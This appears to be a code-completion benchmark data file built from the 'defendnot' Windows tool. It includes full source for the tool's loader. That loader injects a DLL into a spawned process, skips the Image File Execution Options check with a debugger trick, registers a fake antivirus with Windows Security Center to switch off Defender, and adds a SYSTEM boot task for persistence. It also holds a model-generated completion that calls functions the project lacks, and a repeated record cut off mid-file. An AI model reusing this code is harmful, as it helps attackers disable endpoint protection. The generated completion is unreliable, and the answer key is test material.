File size: 147,083 Bytes
f18999e
 
 
 
 
1
2
3
4
5
6
{"repo_name": "defendnot", "file_name": "/defendnot/defendnot/dllmain.cpp", "inference_info": {"prefix_code": "#include \"bootstrap/bootstrap.hpp\"\n#include \"core/log.hpp\"\n#include \"shared/ipc.hpp\"\n\n#include <stdexcept>\n#include <thread>\n\n#include <Windows.h>\n\nnamespace {\n    ", "suffix_code": "\n} // namespace\n\nBOOL __stdcall DllMain(HINSTANCE base, std::uint32_t call_reason, LPVOID reserved) {\n    if (call_reason != DLL_PROCESS_ATTACH) {\n        return TRUE;\n    }\n\n    const auto th = CreateThread(nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(entry_thread), base, 0, nullptr);\n    if (th != nullptr) {\n        CloseHandle(th);\n    }\n\n    return TRUE;\n}\n", "middle_code": "void entry_thread(HMODULE base) {\n        bool success = false;\n        std::unique_ptr<shared::InterProcessCommunication> ipc;\n        try {\n            ipc = std::make_unique<shared::InterProcessCommunication>(shared::InterProcessCommunicationMode::WRITE);\n            defendnot::startup();\n            success = true;\n        } catch (std::exception& err) {\n            MessageBoxA(nullptr, err.what(), \"defendnot\", MB_TOPMOST | MB_ICONERROR);\n        }\n        if (ipc) {\n            (*ipc)->success = success;\n            (*ipc)->finished = true;\n        }\n        FreeLibraryAndExitThread(base, 0);\n    }", "code_description": null, "fill_type": "FUNCTION_TYPE", "language_type": "cpp", "sub_task_type": null}, "context_code": [["/defendnot/defendnot-loader/core/inject.cpp", "#include \"core/core.hpp\"\n\n#include \"shared/defer.hpp\"\n#include \"shared/native.hpp\"\n\n#include <print>\n#include <stdexcept>\n\n#include <Windows.h>\n\nnamespace loader {\n    [[nodiscard]] HANDLE inject(std::string_view dll_path, std::string_view proc_name) {\n        STARTUPINFOA si = {\n            .cb = sizeof(si),\n        };\n        PROCESS_INFORMATION pi = {\n            0,\n        };\n        SECURITY_ATTRIBUTES sa = {\n            .nLength = sizeof(sa),\n            .bInheritHandle = TRUE,\n        };\n\n        /// By setting ReadImageFileExecOptions to FALSE and attaching ourselves as a debugger we can skip the IFEO\n        /// \\xref: https://github.com/es3n1n/defendnot/issues/7#issuecomment-2874903650\n        native::get_peb()->read_image_file_exec_options = 0;\n\n        std::println(\"** booting {}\", proc_name);\n        const auto process_flags = CREATE_SUSPENDED | DEBUG_PROCESS | DEBUG_ONLY_THIS_PROCESS;\n        if (!CreateProcessA(nullptr, const_cast<char*>(proc_name.data()), &sa, &sa, FALSE, process_flags, nullptr, nullptr, &si, &pi)) {\n            throw std::runtime_error(std::format(\"unable to create process: {}\", GetLastError()));\n        }\n\n        /// Detach\n        native::debug_set_process_kill_on_exit(false);\n        native::debug_active_process_stop(pi.dwProcessId);\n\n        defer->void {\n            CloseHandle(pi.hThread);\n            /// Not closing hProcess because we return it\n        };\n\n        LPVOID mem = VirtualAllocEx(pi.hProcess, nullptr, dll_path.size() + 1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n        if (mem == nullptr) {\n            throw std::runtime_error(std::format(\"unable to allocate memory: {}\", GetLastError()));\n        }\n\n        defer->void {\n            VirtualFreeEx(pi.hProcess, mem, 0, MEM_RELEASE);\n        };\n\n        if (!WriteProcessMemory(pi.hProcess, mem, dll_path.data(), dll_path.size() + 1, nullptr)) {\n            throw std::runtime_error(std::format(\"unable to write memory: {}\", GetLastError()));\n        }\n\n        HANDLE thread = CreateRemoteThread(pi.hProcess, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(LoadLibraryA), mem, 0, nullptr);\n        if (thread == NULL) {\n            throw std::runtime_error(std::format(\"unable to create thread: {}\", GetLastError()));\n        }\n\n        defer->void {\n            CloseHandle(thread);\n        };\n\n        /// Wait for DllMain to complete\n        WaitForSingleObject(thread, INFINITE);\n        return pi.hProcess;\n    }\n} // namespace loader\n"], ["/defendnot/defendnot-loader/main.cpp", "#include \"core/core.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/defer.hpp\"\n#include \"shared/ipc.hpp\"\n#include \"shared/strings.hpp\"\n#include <argparse/argparse.hpp>\n\n#include <format>\n#include <print>\n#include <thread>\n\nnamespace {\n    void setup_window(const loader::Config& config) {\n        if ((!config.from_autorun || config.verbose) && config.alloc_console) {\n            shared::alloc_console();\n        }\n    }\n\n    void setup_context(const loader::Config& config) {\n        std::println(\"** setting up context\");\n\n        if (config.name.length() > shared::kMaxNameLength) {\n            throw std::runtime_error(std::format(\"Max name length is {} characters\", shared::kMaxNameLength));\n        }\n\n        shared::ctx.state = config.disable ? shared::State::OFF : shared::State::ON;\n        shared::ctx.verbose = config.verbose;\n        std::ranges::copy(config.name, shared::ctx.name.data());\n\n        /// No need to overwrite ctx if we are called from autorun\n        if (!config.from_autorun) {\n            std::println(\"** overwriting ctx.bin\");\n            shared::ctx.serialize();\n        }\n    }\n\n    [[nodiscard]] HANDLE load_defendnot() {\n        std::println(\"** loading defendnot\");\n\n        auto dll_path = shared::get_this_module_path().parent_path();\n        dll_path /= strings::kDllName;\n        if (!std::filesystem::exists(dll_path)) {\n            throw std::runtime_error(std::format(\"{} does not exist!\", strings::kDllName));\n        }\n\n        return loader::inject(dll_path.string(), strings::kVictimProcess);\n    }\n\n    void wait_for_finish(shared::InterProcessCommunication& ipc) {\n        std::println(\"** waiting for process to finish, this can take a while\");\n        std::cout << std::flush;\n        while (!ipc->finished) {\n            std::this_thread::sleep_for(std::chrono::milliseconds(500));\n        }\n        std::println(\"** success: {}\", ipc->success);\n    }\n\n    void process_autorun(const loader::Config& config) {\n        if (shared::ctx.state == shared::State::ON && config.enable_autorun) {\n            std::println(\"** added to autorun: {}\", loader::add_to_autorun(config.autorun_type));\n        } else {\n            std::println(\"** removed from autorun: {}\", loader::remove_from_autorun());\n        }\n    }\n\n    void banner(const loader::Config& config) {\n        std::println();\n        std::println(\"thanks for using {}\", strings::kProjectName);\n        std::println(\"please don't forget to leave a star at {}\", strings::kRepoUrl);\n\n        if (!config.from_autorun && config.alloc_console) {\n            system(\"pause\");\n        }\n    }\n} // namespace\n\nint main(int argc, char* argv[]) try {\n    argparse::ArgumentParser program(std::format(\"{}-loader\", strings::kProjectName), strings::kVersion.data(), argparse::default_arguments::none);\n\n    const auto fatal_print = [](const std::string_view str) -> void {\n        shared::alloc_console();\n        std::cerr << str << std::endl;\n        system(\"pause\");\n        std::exit(EXIT_FAILURE);\n    };\n\n    /// We are registering these ourselves because we have to alloc console first\n    program.add_argument(\"-h\", \"--help\")\n        .help(\"prints help message and exits\")\n        .default_value(false)\n        .implicit_value(true)\n        .action([&fatal_print, &program](const auto& /*unused*/) -> void { fatal_print(program.help().str()); });\n    program.add_argument(\"--version\")\n        .help(\"shows version and exits\")\n        .default_value(false)\n        .implicit_value(true)\n        .action([&fatal_print](const auto& /*unused*/) -> void { fatal_print(std::format(\"{}-loader v{}\", strings::kProjectName, strings::kVersion)); });\n\n    /// defendnot-loader parameters:\n    program.add_argument(\"-n\", \"--name\").help(\"av display name\").default_value(std::string(strings::kDefaultAVName)).nargs(1);\n    program.add_argument(\"-d\", \"--disable\").help(std::format(\"disable {}\", strings::kProjectName)).default_value(false).implicit_value(true);\n    program.add_argument(\"-v\", \"--verbose\").help(\"verbose logging\").default_value(false).implicit_value(true);\n    program.add_argument(\"--silent\").help(\"do not allocate console\").default_value(false).implicit_value(true);\n    program.add_argument(\"--autorun-as-user\").help(\"create autorun task as currently logged in user\").default_value(false).implicit_value(true);\n    program.add_argument(\"--disable-autorun\").help(\"disable autorun task creation\").default_value(false).implicit_value(true);\n    program.add_argument(\"--from-autorun\").hidden().default_value(false).implicit_value(true);\n\n    try {\n        program.parse_args(argc, argv);\n    } catch (std::exception& e) {\n        std::stringstream ss;\n        ss << e.what() << '\\n';\n        ss << program.help().str();\n        fatal_print(ss.str());\n        return EXIT_FAILURE;\n    }\n\n    auto config = loader::Config{\n        .name = program.get<std::string>(\"-n\"),\n        .disable = program.get<bool>(\"-d\"),\n        .alloc_console = !program.get<bool>(\"--silent\"),\n        .verbose = program.get<bool>(\"-v\"),\n        .from_autorun = program.get<bool>(\"--from-autorun\"),\n        .autorun_type = program.get<bool>(\"--autorun-as-user\") ? /// As system on boot is the default value\n                            loader::AutorunType::AS_CURRENT_USER_ON_LOGIN :\n                            loader::AutorunType::AS_SYSTEM_ON_BOOT,\n        .enable_autorun = !program.get<bool>(\"--disable-autorun\"),\n    };\n\n    /// When running from autorun, we'll be missing all the cli arguments, so lets load some relevant ones\n    if (config.from_autorun) {\n        shared::ctx.deserialize();\n        config.verbose = shared::ctx.verbose;\n    }\n\n    if (!config.alloc_console && config.verbose) {\n        fatal_print(\"--silent flag can not be used in combination with --verbose\");\n    }\n\n    setup_window(config);\n    loader::ensure_environment();\n\n    setup_context(config);\n\n    /// \\todo @es3n1n: move this to a separate function and add move ctor for ipc\n    std::println(\"** setting up ipc\");\n    auto ipc = shared::InterProcessCommunication(shared::InterProcessCommunicationMode::READ_WRITE, true);\n    ipc->finished = false;\n\n    const auto process = load_defendnot();\n    defer->void {\n        TerminateProcess(process, 0);\n    };\n\n    wait_for_finish(ipc);\n\n    /// Only create autorun task when not running from autorun, no need to recreate it because we're missing some config vars\n    if (!config.from_autorun) {\n        process_autorun(config);\n    }\n\n    banner(config);\n\n    return EXIT_SUCCESS;\n} catch (std::exception& err) {\n    shared::alloc_console();\n    std::println(stderr, \"** fatal error: {}\", err.what());\n    system(\"pause\");\n    return EXIT_FAILURE;\n}\n\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, int nCmdShow) {\n    return main(__argc, __argv);\n}\n"], ["/defendnot/wsc-binary-check/main.cpp", "#include <Windows.h>\n#include <winternl.h>\n\n#include <filesystem>\n#include <fstream>\n#include <optional>\n#include <print>\n#include <ranges>\n#include <set>\n\n#include \"shared/defer.hpp\"\n\n#pragma comment(lib, \"Crypt32.lib\")\n\nnamespace {\n    constexpr std::string_view kTargetDirectory = \"c:\\\\Windows\\\\System32\";\n    /* constexpr */ auto kTargetFileExts = std::set<std::string_view>{\".exe\"};\n\n    constexpr std::uint16_t kDosMagic = 0x5A4D;\n    constexpr std::uint32_t kNtSignature = 0x00004550;\n    constexpr std::uint16_t kARM64Machine = 0xAA64;\n    constexpr std::uint16_t kAMD64Machine = 0x8664;\n    constexpr std::uint16_t kI386Machine = 0x014C;\n    constexpr std::uint16_t kDllCharacteristicsForceIntegrityMask = 0x80;\n\n    [[nodiscard]] std::optional<std::vector<std::uint8_t>> read_file(const std::filesystem::path path) {\n        std::ifstream file(path, std::ios::binary);\n        if (!file.good()) {\n            return std::nullopt;\n        }\n\n        const auto size = std::filesystem::file_size(path);\n        std::vector<std::uint8_t> buffer(size);\n\n        file.read(reinterpret_cast<char*>(buffer.data()), static_cast<std::streamsize>(buffer.size()));\n        return buffer;\n    }\n\n    [[nodiscard]] bool check_characteristics(const std::span<std::uint8_t> data) {\n        if (data.size() < sizeof(IMAGE_DOS_HEADER)) {\n            throw std::runtime_error(\"got invalid pe image\");\n        }\n\n        const auto p_dos = reinterpret_cast<PIMAGE_DOS_HEADER>(data.data());\n        if (p_dos->e_magic != kDosMagic) {\n            throw std::runtime_error(\"got invalid pe image (2)\");\n        }\n\n        const auto p_nt = reinterpret_cast<PIMAGE_NT_HEADERS>(data.data() + p_dos->e_lfanew);\n        if (p_nt->Signature != kNtSignature) {\n            throw std::runtime_error(\"got invalid pe image (3)\");\n        }\n\n        const auto machine = p_nt->FileHeader.Machine;\n        std::uint16_t characteristics;\n\n        if (machine == kARM64Machine || machine == kAMD64Machine) {\n            characteristics = reinterpret_cast<PIMAGE_NT_HEADERS64>(p_nt)->OptionalHeader.DllCharacteristics;\n        } else if (machine == kI386Machine) {\n            characteristics = reinterpret_cast<PIMAGE_NT_HEADERS32>(p_nt)->OptionalHeader.DllCharacteristics;\n        } else {\n            throw std::runtime_error(std::format(\"unsupported machine: {:#x}\", machine));\n        }\n\n        return (characteristics & kDllCharacteristicsForceIntegrityMask) != 0;\n    }\n\n    [[nodiscard]] bool check_signature(const std::filesystem::path path) {\n        HCERTSTORE store = {0};\n        HCRYPTMSG msg = {0};\n        if (!CryptQueryObject(1, path.wstring().c_str(), 0x400, 0xE, 0, nullptr, nullptr, nullptr, &store, &msg, nullptr) //\n            || !store || !msg) {\n            /// Most likely the binary is just not signed\n            return false;\n        }\n\n        defer->void {\n            CryptMsgClose(msg);\n            CertCloseStore(store, 1);\n        };\n\n        PCCERT_CONTEXT signer = nullptr;\n        if (!CryptMsgGetAndVerifySigner(msg, 0, nullptr, 2, &signer, nullptr) || signer == nullptr) {\n            throw std::runtime_error(std::format(\"CryptMsgGetAndVerifySigner() on {}\", path.string()));\n        }\n\n        defer->void {\n            CertFreeCertificateContext(signer);\n        };\n\n        /// I don't think we have to do something with signer?\n        return true;\n    }\n} // namespace\n\nint main() try {\n    for (auto& entry : std::filesystem::recursive_directory_iterator(kTargetDirectory, std::filesystem::directory_options::skip_permission_denied)) {\n        auto path = entry.path();\n        auto ext = path.extension().string() //\n                   | std::views::transform([](const char c) -> char { return ::tolower(c); }) //\n                   | std::ranges::to<std::string>();\n\n        if (!kTargetFileExts.contains(ext)) {\n            continue;\n        }\n\n        auto file = read_file(path);\n        if (!file.has_value()) {\n            std::println(stderr, \"unable to read {}\", path.string());\n            continue;\n        }\n\n        const std::span file_ptr = *file;\n        if (!check_characteristics(file_ptr)) {\n            continue;\n        }\n\n        if (!check_signature(path)) {\n            continue;\n        }\n\n        std::println(\"matches: {}\", path.string());\n    }\n\n    return EXIT_SUCCESS;\n} catch (const std::exception& e) {\n    std::println(stderr, \"fatal error: {}\", e.what());\n    return EXIT_FAILURE;\n}\n"], ["/defendnot/defendnot-loader/core/autorun.cpp", "#include \"core/core.hpp\"\n\n#include \"shared/com.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/strings.hpp\"\n\n#include <memory>\n#include <print>\n#include <stdexcept>\n#include <type_traits>\n\n#include <comdef.h>\n#include <taskschd.h>\n\n#pragma comment(lib, \"taskschd.lib\")\n#pragma comment(lib, \"comsupp.lib\")\n#pragma comment(lib, \"ole32.lib\")\n\nnamespace loader {\n    namespace {\n        constexpr std::string_view kTaskName = strings::kProjectName;\n\n        void co_initialize() {\n            static std::once_flag fl;\n            std::call_once(fl, []() -> void {\n                const auto result = CoInitializeEx(nullptr, COINIT_MULTITHREADED);\n\n                if (FAILED(result)) {\n                    throw std::runtime_error(\"failed to CoInitializeEx\");\n                }\n            });\n        }\n\n        template <typename Callable>\n        [[nodiscard]] bool with_service(Callable&& callback) {\n            co_initialize();\n\n            com::Ptr<ITaskService> service;\n            auto hr =\n                CoCreateInstance(CLSID_TaskScheduler, nullptr, CLSCTX_INPROC_SERVER, IID_ITaskService, reinterpret_cast<void**>(service.ref_to_ptr()));\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            hr = service->Connect(VARIANT{}, VARIANT{}, VARIANT{}, VARIANT{});\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITaskFolder> root_folder;\n            hr = service->GetFolder(BSTR(L\"\\\\\"), root_folder.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            /// Cleanup our task, we will recreate it in the callback if needed\n            root_folder->DeleteTask(BSTR(kTaskName.data()), 0);\n            return callback(service.get(), root_folder.get());\n        }\n    } // namespace\n\n    [[nodiscard]] bool add_to_autorun(AutorunType type) {\n        const auto bin_path = shared::get_this_module_path();\n\n        return with_service([bin_path, type](ITaskService* service, ITaskFolder* folder) -> bool {\n            /// Deduce the autorun config based on type\n            const auto task_trigger = type == AutorunType::AS_SYSTEM_ON_BOOT ? TASK_TRIGGER_BOOT : TASK_TRIGGER_LOGON;\n            const auto logon_type = type == AutorunType::AS_SYSTEM_ON_BOOT ? TASK_LOGON_SERVICE_ACCOUNT : TASK_LOGON_INTERACTIVE_TOKEN;\n\n            BSTR user_id = nullptr;\n            auto bstr_sys = bstr_t(L\"SYSTEM\");\n            if (type == AutorunType::AS_SYSTEM_ON_BOOT) {\n                user_id = bstr_sys;\n            }\n\n            com::Ptr<ITaskDefinition> task;\n            auto hr = service->NewTask(0, task.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IRegistrationInfo> reg_info;\n            hr = task->get_RegistrationInfo(reg_info.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IPrincipal> principal;\n            hr = task->get_Principal(principal.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITriggerCollection> trigger_collection;\n            hr = task->get_Triggers(trigger_collection.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITrigger> trigger;\n            hr = trigger_collection->Create(task_trigger, trigger.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IActionCollection> action_collection;\n            hr = task->get_Actions(action_collection.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IAction> action;\n            hr = action_collection->Create(TASK_ACTION_EXEC, action.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IExecAction> exec_action;\n            hr = action->QueryInterface(IID_IExecAction, reinterpret_cast<void**>(exec_action.ref_to_ptr()));\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITaskSettings> settings;\n            hr = task->get_Settings(settings.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            /// Elevated, when system boots\n            principal->put_UserId(user_id);\n            principal->put_LogonType(logon_type);\n            principal->put_RunLevel(TASK_RUNLEVEL_HIGHEST);\n\n            /// Info\n            reg_info->put_Author(bstr_t(strings::kRepoUrl.data()));\n\n            /// Start even if we're on batteries\n            settings->put_DisallowStartIfOnBatteries(VARIANT_FALSE);\n            settings->put_StopIfGoingOnBatteries(VARIANT_FALSE);\n\n            /// Binary\n            exec_action->put_Path(bstr_t(bin_path.string().c_str()));\n            exec_action->put_Arguments(bstr_t(\"--from-autorun\"));\n\n            /// Register the task and we are done\n            com::Ptr<IRegisteredTask> registered_task;\n            hr = folder->RegisterTaskDefinition(bstr_t(kTaskName.data()), task.get(), TASK_CREATE_OR_UPDATE, VARIANT{}, VARIANT{}, TASK_LOGON_NONE,\n                                                variant_t(L\"\"), registered_task.ref_to_ptr());\n            return SUCCEEDED(hr);\n        });\n    }\n\n    [[nodiscard]] bool remove_from_autorun() {\n        return with_service([]<typename... TArgs>(TArgs...) -> bool { return true; });\n    }\n} // namespace loader\n"], ["/defendnot/defendnot/bootstrap/bootstrap.cpp", "#include \"bootstrap.hpp\"\n#include \"core/com.hpp\"\n#include \"core/log.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/defer.hpp\"\n\n#include <Windows.h>\n\nnamespace defendnot {\n    namespace {\n        template <com::ComObject Ty>\n        void apply(const std::string_view log_prefix, const BSTR name) {\n            /// Get the WSC interface\n            auto inst = com::query<Ty>();\n\n            /// This can fail if we dont have any products registered so no com_checked\n            logln(\"{}_unregister: {:#x}\", log_prefix, com::retry_while_pending([&inst]() -> HRESULT { return inst->Unregister(); }) & 0xFFFFFFFF);\n            if (shared::ctx.state == shared::State::OFF) {\n                return;\n            }\n\n            /// Register and activate\n            logln(\"{}_register: {:#x}\", log_prefix, com::checked(inst->Register(name, name, 0, 0)));\n            logln(\"{}_update: {:#x}\", log_prefix, com::checked(inst->UpdateStatus(WSCSecurityProductState::ON, static_cast<BOOL>(true))));\n\n            /// Update the substatuses, if the interface supports this\n            if constexpr (std::is_same_v<Ty, IWscAVStatus4>) {\n                logln(\"{}_scan_update: {:#x}\", log_prefix, com::checked(inst->UpdateScanSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n                logln(\"{}_settings_update: {:#x}\", log_prefix, com::checked(inst->UpdateSettingsSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n                logln(\"{}_prot_update: {:#x}\", log_prefix, com::checked(inst->UpdateProtectionUpdateSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n            }\n        }\n    } // namespace\n\n    void startup() {\n        /// Setup\n        shared::ctx.deserialize();\n        logln(\"init: {:#x}\", com::checked(CoInitialize(nullptr)));\n\n        /// WSC will reject the register request if name is empty\n        auto name_w = std::wstring(shared::ctx.name.begin(), shared::ctx.name.end());\n        if (name_w.empty()) {\n            throw std::runtime_error(\"AV Name can not be empty!\");\n        }\n\n        /// Convert to BSTR\n        auto name = SysAllocString(name_w.c_str());\n        defer->void {\n            SysFreeString(name);\n        };\n\n        /// Register our stuff in the WSC interfaces\n        apply<IWscASStatus>(\"IWscASStatus\", name);\n        apply<IWscAVStatus4>(\"IWscAVStatus4\", name);\n    }\n} // namespace defendnot\n"], ["/defendnot/defendnot-loader/core/ensure_environment.cpp", "#include \"core/core.hpp\"\n#include \"shared/strings.hpp\"\n#include \"util/scm.hpp\"\n\n#include <format>\n#include <print>\n#include <stdexcept>\n\nnamespace loader {\n    void ensure_environment() {\n        auto manager = scm::Manager();\n        if (!manager.valid()) [[unlikely]] {\n            throw std::runtime_error(\"Unable to open scm::Manager\");\n        }\n\n        auto service = manager.get_service(L\"wscsvc\");\n        if (!service.valid() || !service.query_status()) {\n            throw std::runtime_error(std::format(\"{}\\nOpen error: {}\", strings::wsc_unavailable_error().data(), GetLastError()));\n        }\n\n        if (service.state() == scm::ServiceState::RUNNING) {\n            /// Wsc service has been already started, no need to start it ourselves\n            return;\n        }\n\n        /// Let's start the service ourselves\n        std::println(\"** wscsvc is not running, starting it..\");\n        if (!service.start()) {\n            throw std::runtime_error(std::format(\"{}\\nTried to start the service, but go an error: {}\", strings::wsc_unavailable_error(), GetLastError()));\n        }\n\n        std::println(\"** successfully started the service, waiting for it to get up..\");\n        while (true) {\n            if (!service.query_status(/*force=*/true)) {\n                throw std::runtime_error(\n                    std::format(\"{}\\nStarted the service, got an error while querying: {}\", strings::wsc_unavailable_error(), GetLastError()));\n            }\n\n            if (const auto state = service.state(); state == scm::ServiceState::RUNNING) {\n                std::println(\"** we are good to go\");\n                return;\n            }\n\n            std::this_thread::sleep_for(std::chrono::milliseconds(500));\n        }\n    }\n} // namespace loader\n"]], "task_instance_info": {"created_time": "2025-08-20 19:54:09", "created_task_model": "DeepSeek-R1", "function_skeleton": "void entry_thread(HMODULE base) {}", "code_description": "This code segment functions to: Execute initialization routines within a dedicated thread during module attachment, handle potential errors through user notifications, update inter-process communication status flags upon completion, and manage resource cleanup before exiting."}, "inference_content": {"inference_model": "DeepSeek-R1", "inference_result": "```cpp\n[TASK_BEGIN]\nvoid entry_thread(HMODULE base) {\n    try {\n        core::log::init();\n        bootstrap::init(base);\n        shared::ipc::init_server();\n\n        while (true) {\n            std::this_thread::sleep_for(std::chrono::seconds(1));\n        }\n    } catch (const std::exception& e) {\n        core::log::error(\"Initialization failed: {}\", e.what());\n        FreeLibraryAndExitThread(base, 0);\n    }\n}\n[TASK_END]\n```", "inference_time": "2025-08-20 19-54-33"}, "editdistance_info": {"edit_distance": 24.2647, "calculate_time": "2025-08-20 19:54:33", "true_code_clean": "void entry_thread(HMODULE base) {\n        bool success = false;\n        std::unique_ptr<shared::InterProcessCommunication> ipc;\n        try {\n            ipc = std::make_unique<shared::InterProcessCommunication>(shared::InterProcessCommunicationMode::WRITE);\n            defendnot::startup();\n            success = true;\n        } catch (std::exception& err) {\n            MessageBoxA(nullptr, err.what(), \"defendnot\", MB_TOPMOST | MB_ICONERROR);\n        }\n        if (ipc) {\n            (*ipc)->success = success;\n            (*ipc)->finished = true;\n        }\n        FreeLibraryAndExitThread(base, 0);\n    }", "predict_code_clean": "void entry_thread(HMODULE base) {\n    try {\n        core::log::init();\n        bootstrap::init(base);\n        shared::ipc::init_server();\n        while (true) {\n            std::this_thread::sleep_for(std::chrono::seconds(1));\n        }\n    } catch (const std::exception& e) {\n        core::log::error(\"Initialization failed: {}\", e.what());\n        FreeLibraryAndExitThread(base, 0);\n    }\n}"}}
{"repo_name": "defendnot", "file_name": "/defendnot/defendnot/dllmain.cpp", "inference_info": {"prefix_code": "#include \"bootstrap/bootstrap.hpp\"\n#include \"core/log.hpp\"\n#include \"shared/ipc.hpp\"\n\n#include <stdexcept>\n#include <thread>\n\n#include <Windows.h>\n\nnamespace {\n    ", "suffix_code": "\n} // namespace\n\nBOOL __stdcall DllMain(HINSTANCE base, std::uint32_t call_reason, LPVOID reserved) {\n    if (call_reason != DLL_PROCESS_ATTACH) {\n        return TRUE;\n    }\n\n    const auto th = CreateThread(nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(entry_thread), base, 0, nullptr);\n    if (th != nullptr) {\n        CloseHandle(th);\n    }\n\n    return TRUE;\n}\n", "middle_code": "void entry_thread(HMODULE base) {\n        bool success = false;\n        std::unique_ptr<shared::InterProcessCommunication> ipc;\n        try {\n            ipc = std::make_unique<shared::InterProcessCommunication>(shared::InterProcessCommunicationMode::WRITE);\n            defendnot::startup();\n            success = true;\n        } catch (std::exception& err) {\n            MessageBoxA(nullptr, err.what(), \"defendnot\", MB_TOPMOST | MB_ICONERROR);\n        }\n        if (ipc) {\n            (*ipc)->success = success;\n            (*ipc)->finished = true;\n        }\n        FreeLibraryAndExitThread(base, 0);\n    }", "code_description": null, "fill_type": "FUNCTION_TYPE", "language_type": "cpp", "sub_task_type": null}, "context_code": [["/defendnot/defendnot-loader/core/inject.cpp", "#include \"core/core.hpp\"\n\n#include \"shared/defer.hpp\"\n#include \"shared/native.hpp\"\n\n#include <print>\n#include <stdexcept>\n\n#include <Windows.h>\n\nnamespace loader {\n    [[nodiscard]] HANDLE inject(std::string_view dll_path, std::string_view proc_name) {\n        STARTUPINFOA si = {\n            .cb = sizeof(si),\n        };\n        PROCESS_INFORMATION pi = {\n            0,\n        };\n        SECURITY_ATTRIBUTES sa = {\n            .nLength = sizeof(sa),\n            .bInheritHandle = TRUE,\n        };\n\n        /// By setting ReadImageFileExecOptions to FALSE and attaching ourselves as a debugger we can skip the IFEO\n        /// \\xref: https://github.com/es3n1n/defendnot/issues/7#issuecomment-2874903650\n        native::get_peb()->read_image_file_exec_options = 0;\n\n        std::println(\"** booting {}\", proc_name);\n        const auto process_flags = CREATE_SUSPENDED | DEBUG_PROCESS | DEBUG_ONLY_THIS_PROCESS;\n        if (!CreateProcessA(nullptr, const_cast<char*>(proc_name.data()), &sa, &sa, FALSE, process_flags, nullptr, nullptr, &si, &pi)) {\n            throw std::runtime_error(std::format(\"unable to create process: {}\", GetLastError()));\n        }\n\n        /// Detach\n        native::debug_set_process_kill_on_exit(false);\n        native::debug_active_process_stop(pi.dwProcessId);\n\n        defer->void {\n            CloseHandle(pi.hThread);\n            /// Not closing hProcess because we return it\n        };\n\n        LPVOID mem = VirtualAllocEx(pi.hProcess, nullptr, dll_path.size() + 1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n        if (mem == nullptr) {\n            throw std::runtime_error(std::format(\"unable to allocate memory: {}\", GetLastError()));\n        }\n\n        defer->void {\n            VirtualFreeEx(pi.hProcess, mem, 0, MEM_RELEASE);\n        };\n\n        if (!WriteProcessMemory(pi.hProcess, mem, dll_path.data(), dll_path.size() + 1, nullptr)) {\n            throw std::runtime_error(std::format(\"unable to write memory: {}\", GetLastError()));\n        }\n\n        HANDLE thread = CreateRemoteThread(pi.hProcess, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(LoadLibraryA), mem, 0, nullptr);\n        if (thread == NULL) {\n            throw std::runtime_error(std::format(\"unable to create thread: {}\", GetLastError()));\n        }\n\n        defer->void {\n            CloseHandle(thread);\n        };\n\n        /// Wait for DllMain to complete\n        WaitForSingleObject(thread, INFINITE);\n        return pi.hProcess;\n    }\n} // namespace loader\n"], ["/defendnot/defendnot-loader/main.cpp", "#include \"core/core.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/defer.hpp\"\n#include \"shared/ipc.hpp\"\n#include \"shared/strings.hpp\"\n#include <argparse/argparse.hpp>\n\n#include <format>\n#include <print>\n#include <thread>\n\nnamespace {\n    void setup_window(const loader::Config& config) {\n        if ((!config.from_autorun || config.verbose) && config.alloc_console) {\n            shared::alloc_console();\n        }\n    }\n\n    void setup_context(const loader::Config& config) {\n        std::println(\"** setting up context\");\n\n        if (config.name.length() > shared::kMaxNameLength) {\n            throw std::runtime_error(std::format(\"Max name length is {} characters\", shared::kMaxNameLength));\n        }\n\n        shared::ctx.state = config.disable ? shared::State::OFF : shared::State::ON;\n        shared::ctx.verbose = config.verbose;\n        std::ranges::copy(config.name, shared::ctx.name.data());\n\n        /// No need to overwrite ctx if we are called from autorun\n        if (!config.from_autorun) {\n            std::println(\"** overwriting ctx.bin\");\n            shared::ctx.serialize();\n        }\n    }\n\n    [[nodiscard]] HANDLE load_defendnot() {\n        std::println(\"** loading defendnot\");\n\n        auto dll_path = shared::get_this_module_path().parent_path();\n        dll_path /= strings::kDllName;\n        if (!std::filesystem::exists(dll_path)) {\n            throw std::runtime_error(std::format(\"{} does not exist!\", strings::kDllName));\n        }\n\n        return loader::inject(dll_path.string(), strings::kVictimProcess);\n    }\n\n    void wait_for_finish(shared::InterProcessCommunication& ipc) {\n        std::println(\"** waiting for process to finish, this can take a while\");\n        std::cout << std::flush;\n        while (!ipc->finished) {\n            std::this_thread::sleep_for(std::chrono::milliseconds(500));\n        }\n        std::println(\"** success: {}\", ipc->success);\n    }\n\n    void process_autorun(const loader::Config& config) {\n        if (shared::ctx.state == shared::State::ON && config.enable_autorun) {\n            std::println(\"** added to autorun: {}\", 